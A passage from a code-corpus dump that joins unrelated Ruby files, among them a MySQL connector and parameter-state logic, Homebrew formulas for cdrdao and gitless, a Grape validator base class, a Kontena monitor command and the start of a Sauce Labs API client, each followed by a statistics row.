# index parameter rows by parameter_id so matching below is a hash lookup
parameterIdTable = {}
parameters.each{|p|
id = p["parameter_id"].to_i ;
parameterIdTable[id] = (parameterIdTable[id] || Array.new).push(p) ;
}
results.each do |r|
# ps = parameters.select { |p|
# p["parameter_id"].to_i == r["result_id"].to_i }
# NOTE(review): ps is nil when a result row references a parameter id
# absent from the parameter table; ps.each would then raise --
# presumably every result has a matching parameter. TODO confirm.
ps = parameterIdTable[r["result_id"].to_i] ;
ps.each do |p|
if p["state"] != PARAMETER_STATE_FINISH
# unless (retval = pconnector.update_record(
# #{:state => PARAMETER_STATE_READY},
# {state: PARAMETER_STATE_FINISH},
# "parameter_id = #{r["result_id"].to_i}")).nil?
unless (retval =
pconnector.update_record({state: PARAMETER_STATE_FINISH},
[:eq, [:field, "parameter_id"],
r["result_id"].to_i])).nil?
retval.each { |ret| warn(ret) }
end
end
finished_parameters << p
finished_parameter_ids << p["parameter_id"].to_i
end
end
# anything not finished and without a result row is removed
parameters.each do |p|
if p["state"] != PARAMETER_STATE_FINISH &&
!finished_parameter_ids.include?(p["parameter_id"].to_i)
# unless (retval = pconnector.delete_record(
# "parameter_id = #{p["parameter_id"].to_i}")).nil?
unless (retval =
pconnector.delete_record([:eq, [:field, "parameter_id"],
p["parameter_id"].to_i])).nil?
retval.each { |ret| warn(ret) }
end
end
end
return finished_parameters
end
def update_record(type, arg_hash, condition)
if (connector = get_connector(type)).nil?
error("invalid type: #{type}")
return []
end
connector.update_record(arg_hash, condition)
end
## Apply ((|arg_hash|)) to the parameter records matching
## ((|condition|)). Returns 0 on success, -1 (after logging the rows
## returned by the connector) on failure.
def update_parameter(arg_hash, condition)
  failures = @connectors[:parameter].update_record(arg_hash, condition)
  return 0 if failures.nil?
  error("fail to update the parameter record.")
  failures.each { |failure| error(failure) }
  -1
end
# [2013/09/08 I.Noda] !!!! need to improve.
# most of operations in this methods should be done on DB,
# instead of on-memory.
# Reconciles parameter states against the stored results: every
# EXECUTING parameter that already has a result row is promoted to
# FINISH, and an EXECUTING parameter without a result whose
# execution_start lies more than ((|expired_timeout|)) seconds in the
# past (by the database clock, see read_time) is reset to READY for
# re-execution.
# expired_timeout :: expiry window in seconds.
# returned value :: p_ready, p_alloc, p_execu, p_finis counts plus the
# ids of the parameters newly marked FINISH -- or five nils when the
# database time cannot be read.
def update_parameter_state(expired_timeout)
pconnector = @connectors[:parameter]
rconnector = @connectors[:result]
finished_parameters = []
if (timeval = read_time(:parameter)).nil?
error("fail to get current time from the parameter database.")
return nil, nil, nil, nil, nil
end
parameters = pconnector.read_record # current executing parameters
results = rconnector.read_record # current stored results
# count the number of the parameter each state.
# [2013/09/24 I.Noda] change for speed up
p_ready = p_alloc = p_execu = p_finis = 0 ;
parameters.each{|p|
case(p["state"])
when PARAMETER_STATE_READY then p_ready += 1 ;
when PARAMETER_STATE_ALLOCATING then p_alloc += 1 ;
when PARAMETER_STATE_EXECUTING then p_execu += 1 ;
when PARAMETER_STATE_FINISH then p_finis += 1 ;
end
}
# p_ready = parameters.select { |p|
# p["state"] == PARAMETER_STATE_READY }.length
# p_alloc = parameters.select { |p|
# p["state"] == PARAMETER_STATE_ALLOCATING }.length
# p_execu = parameters.select { |p|
# p["state"] == PARAMETER_STATE_EXECUTING }.length
# p_finis = parameters.select { |p|
# p["state"] == PARAMETER_STATE_FINISH }.length
# [2013/09/24 I.Noda] change for speed up
# index result rows by result_id so the matching below is a hash lookup
resultIdTable = {} ;
results.each{|r|
id = r["result_id"].to_i;
resultIdTable[id] = (resultIdTable[id] || Array.new()).push(r)
}
# parameters.select { |p| p["state"] == PARAMETER_STATE_EXECUTING }
# .each do |p|
parameters.each do |p|
next if (p["state"] != PARAMETER_STATE_EXECUTING) ;
# if (results.select { |r| p["parameter_id"] == r["result_id"] })
# .length > 0
# a stored result exists -> this parameter's run completed
if(resultIdTable[p["parameter_id"].to_i]) then
# if (retval = pconnector.update_record(
# {state: PARAMETER_STATE_FINISH},
# "parameter_id = #{p["parameter_id"]}")).length != 0
if (retval =
pconnector.update_record({state: PARAMETER_STATE_FINISH},
[:eq, [:field, "parameter_id"],
p["parameter_id"]])).length != 0
error("fail to update the parameter state")
retval.each { |r| error(r) }
next
end
p_execu -= 1
p_finis += 1
finished_parameters << p["parameter_id"].to_i
else # check the executing parameter is expired?
# NOTE(review): execution_start is compared as a unix timestamp;
# timeval comes from read_time's "runixtime" query.
if timeval - p["execution_start"].to_i > expired_timeout
# if (retval = pconnector.update_record(
# {allocation_start: nil,
# execution_start: nil,
# state: PARAMETER_STATE_READY},
# "parameter_id = #{p["parameter_id"]}")).length != 0
if (retval =
pconnector.update_record({ allocation_start: nil,
execution_start: nil,
state: PARAMETER_STATE_READY},
[:eq, [:field, "parameter_id"],
p["parameter_id"]])).length != 0
error("fail to update the expired parameter.")
retval.each { |r| error(r) }
end
p_execu -= 1
p_ready += 1
end
end
end
return p_ready, p_alloc, p_execu, p_finis, finished_parameters
end
def close
DATABASE_LIST.each { |l| @connectors[l.to_sym].close }
end
private
# Looks up the connector for a known database ((|type|)); returns nil
# for anything outside the supported set.
def get_connector(type)
  known = %i[project execution executable node parameter result]
  known.include?(type) ? @connectors[type] : nil
end
def create(type, arg_hash, condition)
if (conn = get_connector(type)).nil?
error("invalid database type.")
return nil
end
return conn.create(arg_hash, condition)
end
def read(type, arg_hash, condition)
if (conn = get_connector(type)).nil?
error("invalid database type.")
return nil
end
return conn.read(arg_hash, condition)
end
def update(type, arg_hash, condition)
if (conn = get_connector(type)).nil?
error("invalid database type.")
return nil
end
return conn.update(arg_hash, condition)
end
def delete(type, arg_hash, condition)
if (conn = get_connector(type)).nil?
error("invalid database type.")
return nil
end
return conn.delete(arg_hash, condition)
end
end
#=== MySQL database connector.
#Simple mysql database connection functionality is provided with this class.
class MysqlConnector
include Practis
attr_reader :command_generator
attr_reader :hostname, :username, :database, :table
#def initialize
#query_retry :: if SQL failed, how many times it retry the query. if this
#value is negative, it eternally retries.
def initialize(schema, hostname, username, password, database = nil,
table = nil, query_retry = QUERY_RETRY_TIMES)
@command_generator = Practis::Database::MysqlCommandGenerator.new(
schema)
@hostname = hostname
@username = username
@password = password
@database = database
@table = table
@query_retry = query_retry
##<<<[2013/09/04 I.Noda]
## for exclusive connection use
@mutex = Mutex.new() ;
##>>>[2013/09/04 I.Noda]
connect
end
#=== Specified database exist? or not.
#database :: database name.
#returned_value :: If exist, it returns true. Otherwise, it returns false.
# Checks whether the MySQL server already contains the named database
# by running the "rdatabase" (SHOW DATABASES) command and scanning the
# returned rows for a matching "Database" column.
#database :: database name.
#returned_value :: true when present, false otherwise (including when
#                  the query yields no result set).
def exist_database?(database)
  rows = query(@command_generator.get_command(
      nil, nil, {type: "rdatabase"}))
  # any? short-circuits on the first hit; the previous
  # inject(false) { |b, r| b || ... } always scanned every row.
  return rows.any? { |r| r["Database"] == database } unless rows.nil?
  false
end
def exist_table?(database, table)
unless (retval = query(@command_generator.get_command(
database, nil, {type: "rtable"}))).nil?
return retval.inject(false) { |b, r|
b || r["Tables_in_#{database}"] == table }
end
return false
end
def exist_record?(key, value)
if (retval = query(@command_generator.get_command(
@database, @table, {type: "rrecord"}))).nil?
debug("specified table has no record.")
else
retval.each do |r|
if r[key] == value
return true
end
end
end
return false
end
def create_database(database)
# create database
unless (retval = query(@command_generator.get_command(
database, nil, {type: "cdatabase"}))).nil?
warn("fail to create database: #{database}")
retval.each { |r| warn(r) }
return -1
end
return 0
end
def update_setting(database, username)
# set network configuration
unless (retval = query(@command_generator.get_command(
database, nil, {type: "uglobal"}))).nil?
warn("fail to set global options to database: #{database}.")
retval.each { |r| warn(r) }
return -1
end
# set authentification
unless (retval = query(@command_generator.get_command(
database, nil, {type: "cgrant", username: username}))).nil?
warn("fail to set grant global option to database: #{database}.")
retval.each { |r| warn(r) }
return -2
end
unless (retval = query(@command_generator.get_command(
database, nil, {type: "cgrantl", username: username}))).nil?
warn("fail to set grant local option to database: #{database}.")
retval.each { |r| warn(r) }
return -3
end
return 0
end
def create_table(database, table)
com = @command_generator.get_command(database, table,
{type: "ctable"}) ;
# debug("create_table:com=#{com}") ;
unless (retval = query(com)).nil?
warn("fail to create table: #{table}.")
retval.each { |r| warn(r) }
return -1
end
return 0
end
#=== Insert a record into this connector's table.
#arg_hash :: column => value pairs; mutated here to carry the command
#            type ("cinsert") for the command generator.
#returned value :: an Array of rows produced by the INSERT query --
#                  NOTE(review): callers treat a non-empty Array as
#                  failure and an empty one as success. TODO confirm.
def insert_record(arg_hash)
arg_hash[:type] = "cinsert"
# <<< [2013/09/05 I.noda]
#retq = query(@command_generator.get_command(
# @database, @table, arg_hash))
#retq.nil? ? [] : retq.inject([]) { |r, q| r << q }
# NOTE: `return` inside the block performs a non-local return from
# insert_record itself; query() hands the block's value back while the
# connection mutex is still held.
query(@command_generator.get_command(@database, @table, arg_hash)){
|retq|
return retq.nil? ? [] : retq.inject([]) { |r, q| r << q }
}
# >>> [2013/09/05 I.noda]
end
##--------------------------------------------------
##--- read_record([condition]) {|result| ...}
## send query to get data wrt condition.
## If ((|&block|)) is given, the block is called with
## ((|result|)) data of the query.
## If ((|&block|)) is not given, it return an Array of the
## result.
def read_record(condition = nil,&block)
# <<< [2013/09/05 I.noda]
#retq = query(@command_generator.get_command(
# @database, @table, {type: "rrecord"}, condition))
#retq.nil? ? [] : retq.inject([]) { |r, q| r << q }
# [2013/09/08 I.Noda] use Array.new instead of [] for safety.
if(block.nil?)
query(@command_generator.get_command(@database, @table,
{type: "rrecord"}, condition)){
|retq|
result = Array.new()
return retq.nil? ? result : retq.inject(result) { |r, q| r << q }
}
else
query(@command_generator.get_command(@database, @table,
{type: "rrecord"}, condition),
&block) ;
end
# <<< [2013/09/05 I.noda]
end
def delete_record(condition = nil)
# <<< [2013/09/05 I.noda]
#retq = query(@command_generator.get_command(
# @database, @table, {type: "drecord"}, condition))
#retq.nil? ? [] : retq.inject([]) { |r, q| r << q }
query(@command_generator.get_command(@database, @table,
{type: "drecord"}, condition)){
|retq|
return retq.nil? ? [] : retq.inject([]) { |r, q| r << q }
}
# <<< [2013/09/05 I.noda]
end
def update_record(arg_hash, condition = nil)
arg_hash[:type] = "urecord"
# <<< [2013/09/05 I.noda]
#retq = query(@command_generator.get_command(
# @database, @table, arg_hash, condition))
#retq.nil? ? [] : retq.inject([]) { |r, q| r << q }
query(@command_generator.get_command(@database, @table,
arg_hash, condition)){
|retq|
return retq.nil? ? [] : retq.inject([]) { |r, q| r << q }
}
# <<< [2013/09/05 I.noda]
end
def inner_join_record(condition = nil)
# <<< [2013/09/05 I.noda]
#retq = query(@command_generator.get_command(
# @database, @table, {type: "rinnerjoin"}, condition))
#retq.nil? ? [] : retq.inject([]) { |r, q| r << q }
query(@command_generator.get_command(@database, @table,
{type: "rinnerjoin"}, condition)){
|retq|
return retq.nil? ? [] : retq.inject([]) { |r, q| r << q }
}
# <<< [2013/09/05 I.noda]
end
def read(arg_hash, condition = nil, &block)
com = @command_generator.get_command(@database, @table,
arg_hash, condition)
# info(arg_hash.inspect) ;
# info(com) ;
query(com, &block)
end
#=== Close the database connection.
def close
begin
@connector.close
rescue Exception => e
error("failed to close the database connection. #{e.message}")
error(e.backtrace)
raise e
end
end
private
#=== Connect to the database.
def connect
begin
if @database
@connector = Mysql2::Client::new(
host: @hostname,
username: @username,
password: @password,
database: @database
)
else
@connector = Mysql2::Client::new(
host: @hostname,
username: @username,
password: @password
)
end
rescue Exception => e
error("failed to connect database. #{e.message}")
error(e.backtrace)
raise e
end
end
#=== Execute a query.
#query_string :: mysql query.
#returned value :: Mysql2 Result objects.
# query_string :: the SQL text to execute.
# option :: optional second argument forwarded to Mysql2::Client#query.
# block :: when given, called with the result set while the mutex is
#          held; its value becomes query()'s return value (via the
#          non-local `return` below).
# Retries failed queries up to @query_retry times; a negative
# @query_retry never reaches 0, so it retries forever (see #initialize).
def query(query_string, option = nil, &block)
# remaining retry budget for this call
c = @query_retry
while true
@mutex.synchronize(){ ###<<<[2013/09/04 I.Noda] for exclusive call>>>
begin
## <<< [2013/09/05 I.Noda]
## to introduce block call
res = nil ;
if option.nil?
res = @connector.query(query_string)
else
res = @connector.query(query_string, option)
end
if(block) then
# non-local return: leaves query() with the block's value
return block.call(res) ;
else
return res ;
end
## >>> [2013/09/05 I.Noda]
rescue Mysql2::Error => e
error("failed to run query. #{e.message}")
error("failed query: #{query_string}")
error(e.backtrace)
# back off before the next attempt; give up once the budget is spent
sleep(QUERY_RETRY_DURATION)
raise e if c == 0
end
} ###<<<[2013/09/04 I.Noda]>>>
# only reached after a failed attempt (success returns above)
c -= 1
end
end
def create(type, arg_hash, condition)
if (conn = get_connector(type)).nil?
error("invalid database type.")
return nil
end
return conn.create(arg_hash, condition)
end
end
class MongoConnector
end
end
end
| 36.298454 | 85 | 0.519671 |
62b6d3d338bf6efa41b0cfee90905d4ec33bee2f | 1,759 | class Cdrdao < Formula
desc "Record CDs in Disk-At-Once mode"
homepage "http://cdrdao.sourceforge.net/"
url "https://downloads.sourceforge.net/project/cdrdao/cdrdao/1.2.3/cdrdao-1.2.3.tar.bz2"
sha256 "8193cb8fa6998ac362c55807e89ad0b3c63edc6b01afaeb3d5042519527fb75e"
depends_on "pkg-config" => :build
depends_on "libao"
depends_on "libvorbis"
depends_on "mad"
depends_on "lame"
fails_with :llvm do
build 2326
cause "Segfault while linking"
end
# first patch fixes build problems under 10.6
# see https://sourceforge.net/p/cdrdao/patches/23/
patch do
url "https://sourceforge.net/p/cdrdao/patches/_discuss/thread/205354b0/141e/attachment/cdrdao-mac.patch"
sha256 "ee1702dfd9156ebb69f5d84dcab04197e11433dd823e80923fd497812041179e"
end
# second patch fixes device autodetection on OS X
# see https://trac.macports.org/ticket/27819
# upstream bug report:
# https://sourceforge.net/p/cdrdao/bugs/175/
patch :p0, :DATA
def install
system "./configure", "--disable-debug", "--disable-dependency-tracking",
"--prefix=#{prefix}", "--mandir=#{man}"
system "make", "install"
end
end
__END__
--- dao/main.cc 2013-11-26 12:00:00.000000000 -0400
+++ dao/main.cc 2013-11-26 12:00:00.000000000 -0400
@@ -1242,7 +1242,7 @@
const char* getDefaultDevice(DaoDeviceType req)
{
int i, len;
- static char buf[128];
+ static char buf[1024];
// This function should not be called if the command issues
// doesn't actually require a device.
@@ -1270,7 +1270,7 @@
if (req == NEED_CDRW_W && !rww)
continue;
- strncpy(buf, sdata[i].dev.c_str(), 128);
+ strncpy(buf, sdata[i].dev.c_str(), 1024);
delete[] sdata;
return buf;
}
| 29.813559 | 108 | 0.678226 |
4a0385703d3a3a9b70dc607184ce0bae3e6013d9 | 544 | # frozen_string_literal: true
require 'simplecov'
require 'simplecov-cobertura'
SimpleCov.formatter = SimpleCov::Formatter::CoberturaFormatter
SimpleCov.start do
add_filter '/spec/'
add_filter '/features/'
end
$LOAD_PATH.unshift File.expand_path('../../lib', __FILE__)
require 'conjur-policy-parser'
require 'logger'
if ENV['DEBUG']
Conjur::PolicyParser::YAML::Handler.logger.level = Logger::DEBUG
end
require 'sorted_yaml.rb'
RSpec.configure do |c|
c.include SortedYAML
c.order = "random"
c.filter_run_when_matching :focus
end
| 21.76 | 66 | 0.762868 |
62eda3b876b980c6942991ea930150d72f1de1ee | 1,962 | # This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# Note that this schema.rb definition is the authoritative source for your
# database schema. If you need to create the application database on another
# system, you should be using db:schema:load, not running all the migrations
# from scratch. The latter is a flawed and unsustainable approach (the more migrations
# you'll amass, the slower it'll run and the greater likelihood for issues).
#
# It's strongly recommended to check this file into your version control system.
ActiveRecord::Schema.define(:version => 20120307201016) do
create_table "plutus_accounts", :force => true do |t|
t.string "name"
t.string "type"
t.boolean "contra"
t.datetime "created_at", :null => false
t.datetime "updated_at", :null => false
end
add_index "plutus_accounts", ["name", "type"], :name => "index_plutus_accounts_on_name_and_type"
create_table "plutus_transactions", :force => true do |t|
t.string "description"
t.integer "credit_account_id"
t.integer "debit_account_id"
t.decimal "amount", :precision => 20, :scale => 10
t.integer "commercial_document_id"
t.string "commercial_document_type"
t.datetime "created_at", :null => false
t.datetime "updated_at", :null => false
end
add_index "plutus_transactions", ["commercial_document_id", "commercial_document_type"], :name => "plutus_ts_on_commercial_doc"
add_index "plutus_transactions", ["credit_account_id"], :name => "index_plutus_transactions_on_credit_account_id"
add_index "plutus_transactions", ["debit_account_id"], :name => "index_plutus_transactions_on_debit_account_id"
end
| 47.853659 | 129 | 0.703874 |
18abdd674c58e28c258afd5a94bde3af5888c763 | 2,734 | require_relative 'common'
module Kontena::Cli::Apps
class MonitorCommand < Kontena::Command
include Kontena::Cli::Common
include Kontena::Cli::GridOptions
include Common
option ['-f', '--file'], 'FILE', 'Specify an alternate Kontena compose file', attribute_name: :filename, default: 'kontena.yml'
option ['-p', '--project-name'], 'NAME', 'Specify an alternate project name (default: directory name)'
parameter "[SERVICE] ...", "Services to start"
attr_reader :services
def execute
require_config_file(filename)
@services = services_from_yaml(filename, service_list, service_prefix, true)
if services.size > 0
show_monitor(services)
elsif !service_list.empty?
puts "No such service: #{service_list.join(', ')}".colorize(:red)
end
end
def show_monitor(services)
require_api_url
token = require_token
loop do
nodes = {}
services.each do |name, data|
service = prefixed_name(name)
result = client(token).get("services/#{current_grid}/#{service}/containers") rescue nil
if result
services[name]['instances'] = result['containers'].size
result['containers'].each do |container|
container['service'] = name
nodes[container['node']['name']] ||= []
nodes[container['node']['name']] << container
end
end
end
clear_terminal
puts "services:"
services.each do |name, data|
color = color_for_service(name)
puts " #{"■".colorize(color)} #{name} (#{data['instances']} instances)"
end
puts "nodes:"
node_names = nodes.keys.sort
node_names.each do |name|
containers = nodes[name]
puts " #{name} (#{containers.size} instances)"
print " "
containers.each do |container|
icon = "■"
if container['status'] != 'running'
icon = "□"
end
color = color_for_service(container['service'])
print icon.colorize(color)
end
puts ''
end
sleep 1
end
end
# Returns a stable terminal color for the given service name. The first
# time a service is seen it consumes the next color from the rotating
# palette (#colors); later calls reuse the memoized assignment.
# Palette entries are symbols (never false/nil), so ||= is a safe
# memoization here.
def color_for_service(service)
  (color_maps[service] ||= colors.shift).to_sym
end
# Memoized service-name => palette-color map backing color_for_service.
def color_maps
@color_maps ||= {}
end
# Lazily (re)filled palette of terminal colors; refilled whenever
# color_for_service has exhausted it via shift.
def colors
  if @colors.nil? || @colors.empty?
    @colors = %i(
      red green yellow blue magenta cyan bright_red bright_green
      bright_yellow bright_blue bright_magenta bright_cyan
    )
  end
  @colors
end
# Clears the terminal: ESC[H homes the cursor, ESC[2J erases the display.
def clear_terminal
print "\e[H\e[2J"
end
end
end
| 29.085106 | 131 | 0.579371 |
39547c3e7f774024c023c6350a9f344ab2b4f960 | 1,509 | # coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'motion_flux/version'
Gem::Specification.new do |spec|
spec.name = 'motion_flux'
spec.version = MotionFlux::VERSION
spec.authors = ['kayhide']
spec.email = ['[email protected]']
spec.summary = 'MotionFlux supports to build Flux-based RubyMotion apps.'
spec.description = 'MotionFlux supports to build Flux-based RubyMotion apps.'
spec.homepage = 'https://github.com/kayhide/motion_flux'
spec.license = 'MIT'
spec.files = `git ls-files -z`.split("\x0").reject { |f| f.match(%r{^(test|spec|features)/}) }
spec.bindir = 'exe'
spec.executables = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
spec.require_paths = ['lib']
spec.add_runtime_dependency 'motion_blender'
spec.add_runtime_dependency 'motion_blender-support'
spec.add_development_dependency 'bundler', '~> 1.10'
spec.add_development_dependency 'rake', '~> 10.0'
spec.add_development_dependency 'rspec'
spec.add_development_dependency 'fuubar'
spec.add_development_dependency 'pry'
spec.add_development_dependency 'pry-doc'
spec.add_development_dependency 'rubocop'
spec.add_development_dependency 'guard'
spec.add_development_dependency 'guard-rspec'
spec.add_development_dependency 'guard-rubocop'
spec.add_development_dependency 'simplecov'
spec.add_development_dependency 'simplecov-gem-profile'
end
| 40.783784 | 104 | 0.720345 |
034a66e5a0180efabeb75931b06d71722aa67168 | 3,183 | # frozen_string_literal: true
module Grape
module Validations
class Base
attr_reader :attrs
# Creates a new Validator from options specified
# by a +requires+ or +optional+ directive during
# parameter definition.
# @param attrs [Array] names of attributes to which the Validator applies
# @param options [Object] implementation-dependent Validator options
# @param required [Boolean] attribute(s) are required or optional
# @param scope [ParamsScope] parent scope for this Validator
# @param opts [Hash] additional validation options
def initialize(attrs, options, required, scope, opts = {})
@attrs = Array(attrs) # normalized to an Array even for a single name
@option = options
@required = required
@scope = scope
@fail_fast = opts[:fail_fast] || false # abort remaining validators on failure
@allow_blank = opts[:allow_blank] || false
end
# Validates a given request.
# @note Override #validate! unless you need to access the entire request.
# @param request [Grape::Request] the request currently being handled
# @raise [Grape::Exceptions::Validation] if validation failed
# @return [void]
def validate(request)
  params = request.params
  # delegate to validate! only when the scope applies to these params
  validate!(params) if @scope.should_validate?(params)
end
# Validates a given parameter hash.
# @note Override #validate if you need to access the entire request.
# @param params [Hash] parameters to validate
# @raise [Grape::Exceptions::ValidationArrayErrors] if any attribute failed validation
# @return [void]
def validate!(params)
  attributes = SingleAttributeIterator.new(self, @scope, params)
  # we collect errors inside array because
  # there may be more than one error per field
  array_errors = []
  attributes.each do |val, attr_name, empty_val|
    # skip empty values for optional scopes.
    # (restored: this line had been corrupted to "[email protected]?"
    # by an e-mail redaction pass over the source dump)
    next if !@scope.required? && empty_val
    next unless @scope.meets_dependency?(val, params)
    begin
      # required params are always checked; optional ones only when the
      # key is actually present in the (hash-like) value
      if @required || val.respond_to?(:key?) && val.key?(attr_name)
        validate_param!(attr_name, val)
      end
    rescue Grape::Exceptions::Validation => e
      array_errors << e
    end
  end
  # surface all collected failures at once
  raise Grape::Exceptions::ValidationArrayErrors, array_errors if array_errors.any?
end
# Derives the registration short name from a validator class, e.g.
# "Grape::Validations::PresenceValidator" => "presence".
def self.convert_to_short_name(klass)
  path = klass.name.gsub('::', '/')
  # CamelCase -> snake_case (first pass handles acronym runs)
  path = path.gsub(/([A-Z]+)([A-Z][a-z])/, '\1_\2')
  path = path.gsub(/([a-z\d])([A-Z])/, '\1_\2')
  snake = path.tr('-', '_').downcase
  # drop the conventional "_validator" suffix
  File.basename(snake, '_validator')
end
def self.inherited(klass)
return unless klass.name.present?
Validations.register_validator(convert_to_short_name(klass), klass)
end
# Resolves the error message for this validator: an explicit :message
# entry in the options wins over the supplied default key.
def message(default_key = nil)
  opts = @option
  options_key?(:message, opts) ? opts[:message] : default_key
end

# True when +options+ (or this validator's own options when omitted)
# is hash-like and carries a non-nil value under +key+.
def options_key?(key, options = nil)
  options = @option if options.nil?
  options.respond_to?(:key?) && options.key?(key) && !options[key].nil?
end

# Whether this validator aborts the remaining validations on failure.
def fail_fast?
  @fail_fast
end
end
end
end
| 34.978022 | 89 | 0.623311 |
080845976bdaf3216bc35a9c304dc8b848d6b1d2 | 276 | require "scanf.rb"
for i in (1 .. 3) do
(a, b) = STDIN.readline.split(" ").map{ |x| x.to_i(10) }
printf "a = %d b = %d\n", a, b
end
l = STDIN.readline.split(" ").map{ |x| x.to_i(10) }
for j in (0 .. 9) do
printf "%d\n", l[j]
end
| 25.090909 | 60 | 0.449275 |
ab9c3b56ddceccc7587ffffe1d631d1e6caf0213 | 2,833 | class Gitless < Formula
include Language::Python::Virtualenv
desc "Simplified version control system on top of git"
homepage "http://gitless.com/"
url "https://github.com/sdg-mit/gitless/archive/v0.8.5.tar.gz"
# NOTE(review): interior of a Homebrew formula whose class header (desc,
# homepage, url) lies outside this view — presumably the "gitless" formula,
# since the tests below exercise a `gl` binary; confirm against upstream.
sha256 "c93f8f558d05f41777ae36fab7434cfcdb13035ae2220893d5ee222ced1e7b9f"
# Pre-built bottles for the macOS releases current at the time of writing.
bottle do
cellar :any
sha256 "dbd90d04f1b8a52f1fb5863c333743a2e605c89c0bfc3ad822a9acc97280ed1c" => :sierra
sha256 "af14e898522880559559a08e3c65d9946fcdba0bfc74f55d22b9aa63c40b8404" => :el_capitan
sha256 "310cffdb2c69ebfd282959870e94880a7d2fc256510066d609788b36b6368973" => :yosemite
end
# Snow Leopard's system Python is too old, so pull in Homebrew's Python there.
depends_on :python if MacOS.version <= :snow_leopard
depends_on "libgit2"
# Vendored Python dependencies, installed into the formula's private
# virtualenv by virtualenv_install_with_resources below.
resource "args" do
url "https://files.pythonhosted.org/packages/e5/1c/b701b3f4bd8d3667df8342f311b3efaeab86078a840fb826bd204118cc6b/args-0.1.0.tar.gz"
sha256 "a785b8d837625e9b61c39108532d95b85274acd679693b71ebb5156848fcf814"
end
resource "cffi" do
url "https://files.pythonhosted.org/packages/a1/32/e3d6c3a8b5461b903651dd6ce958ed03c093d2e00128e3f33ea69f1d7965/cffi-1.9.1.tar.gz"
sha256 "563e0bd53fda03c151573217b3a49b3abad8813de9dd0632e10090f6190fdaf8"
end
resource "clint" do
url "https://files.pythonhosted.org/packages/3d/b4/41ecb1516f1ba728f39ee7062b9dac1352d39823f513bb6f9e8aeb86e26d/clint-0.5.1.tar.gz"
sha256 "05224c32b1075563d0b16d0015faaf9da43aa214e4a2140e51f08789e7a4c5aa"
end
resource "pycparser" do
url "https://files.pythonhosted.org/packages/be/64/1bb257ffb17d01f4a38d7ce686809a736837ad4371bcc5c42ba7a715c3ac/pycparser-2.17.tar.gz"
sha256 "0aac31e917c24cb3357f5a4d5566f2cc91a19ca41862f6c3c22dc60a629673b6"
end
resource "pygit2" do
url "https://files.pythonhosted.org/packages/29/fb/fd98403ed4ec5554ed4f6de3719d2c672ca2518598061ff7231301ff864b/pygit2-0.24.2.tar.gz"
sha256 "2aae85836c3a8da686220db7db05f91f8797e37edf91cc2a1f88b09fb653166a"
end
resource "sh" do
url "https://files.pythonhosted.org/packages/2e/b8/9920bfdf91a3ffaa23aed32c8438857b2bcec40f2f8babfe0862f7da8fa7/sh-1.12.8.tar.gz"
sha256 "06e51b2f4c6429be7be48ef0e3439bc7f939d57100dd0febb408291af3fe55f3"
end
resource "six" do
url "https://files.pythonhosted.org/packages/b3/b2/238e2590826bfdd113244a40d9d3eb26918bd798fc187e2360a8367068db/six-1.10.0.tar.gz"
sha256 "105f8d68616f8248e24bf0e9372ef04d3cc10104f1980f54d57b2ce73a5ad56a"
end
# Installs the package plus all resources above into a virtualenv under the
# formula prefix.
def install
virtualenv_install_with_resources
end
# Smoke test: init a repo, track two files, commit, and verify git sees them.
test do
system bin/"gl", "init"
system "git", "config", "user.name", "Gitless Install"
system "git", "config", "user.email", "Gitless@Install"
%w[haunted house].each { |f| touch testpath/f }
system bin/"gl", "track", "haunted", "house"
system bin/"gl", "commit", "-m", "Initial Commit"
assert_equal "haunted\nhouse", shell_output("git ls-files").strip
end
end
| 41.661765 | 138 | 0.791387 |
035ca71b809852e9a119888f15d5c56ef4f827ba | 5,492 | require "faraday"
require "json"
module Blade::SauceLabsPlugin::Client
extend self
delegate :config, :username, :access_key, :debug?, to: Blade::SauceLabsPlugin
# Issues one HTTP request against the Sauce Labs REST API.
#
# method - Symbol Faraday verb (:get, :put, :delete, ...)
# path   - String request path under saucelabs.com
# params - Hash payload, serialized as a JSON request body
#
# Returns the Faraday::Response.
def request(method, path, params = {})
  payload = params.to_json
  connection.public_send(method) do |req|
    req.url(path)
    req.headers["Content-Type"] = "application/json"
    req.body = payload
  end
end
# Lists the account's jobs; +options+ are serialized onto the query string.
# Returns the parsed JSON payload.
def get_jobs(options = {})
  query = options.to_query
  response = request(:get, "/rest/v1/#{username}/jobs?#{query}")
  JSON.parse(response.body)
end
# Updates metadata (e.g. pass/fail status) for the job identified by +id+.
def update_job(id, params = {})
  path = "/rest/v1/#{username}/jobs/#{id}"
  request(:put, path, params)
end
# Asks Sauce Labs to stop the running job identified by +id+.
def stop_job(id)
  path = "/rest/v1/#{username}/jobs/#{id}/stop"
  request(:put, path)
end
# Removes the job identified by +id+ from the Sauce Labs job history.
def delete_job(id)
  path = "/rest/v1/#{username}/jobs/#{id}"
  request(:delete, path)
end
# Returns the number of concurrent VMs the account may still start
# (the "remaining overall" figure of the concurrency endpoint).
def get_available_vm_count
  response = request(:get, "/rest/v1/users/#{username}/concurrency")
  payload = JSON.parse(response.body)
  payload["concurrency"][username]["remaining"]["overall"]
end
# Expands the configured browsers into a flat list of Sauce Labs platform
# descriptors ({platform:, browserName:, version:} hashes).
def platforms
[].tap do |platforms|
config.browsers.each do |name, config|
# A browser entry may be given as a bare version (String/Numeric), as a
# full options Hash, or as nothing; normalize to a Hash with :name set.
browser =
case config
when String, Numeric
{ version: config }
when Hash
config.symbolize_keys
else
{}
end.merge(name: name)
# :os may be a comma-separated String, an Array, or absent; normalize
# to an Array of OS name strings.
browser[:os] =
if browser[:os].is_a?(String)
browser[:os].split(",").map(&:strip)
else
Array(browser[:os])
end
platforms.concat platforms_for_browser(browser)
end
end
end
# Resolves one normalized browser spec into concrete platform tuples.
#
# Version selection rules (applied per-OS when :os is given, otherwise over
# all OSes): a negative Numeric :version means "the N newest numeric
# versions"; an explicit :version (or list) is taken verbatim; otherwise the
# single newest version is used.
#
# NOTE(review): the two branches duplicate the version-selection logic and
# the block parameters `os` shadow the outer `os` locals (harmless here but
# triggers Ruby shadowing warnings) — candidates for a later refactor.
def platforms_for_browser(browser)
platforms = available_platforms_for_browser(browser)
versions_by_os = {}
platforms.each do |os, details|
# Newest-first numeric ordering of the known versions per OS.
versions_by_os[os] = details[:versions].uniq.sort_by(&:to_f).reverse
end
if browser[:os].any?
browser[:os].flat_map do |browser_os|
versions =
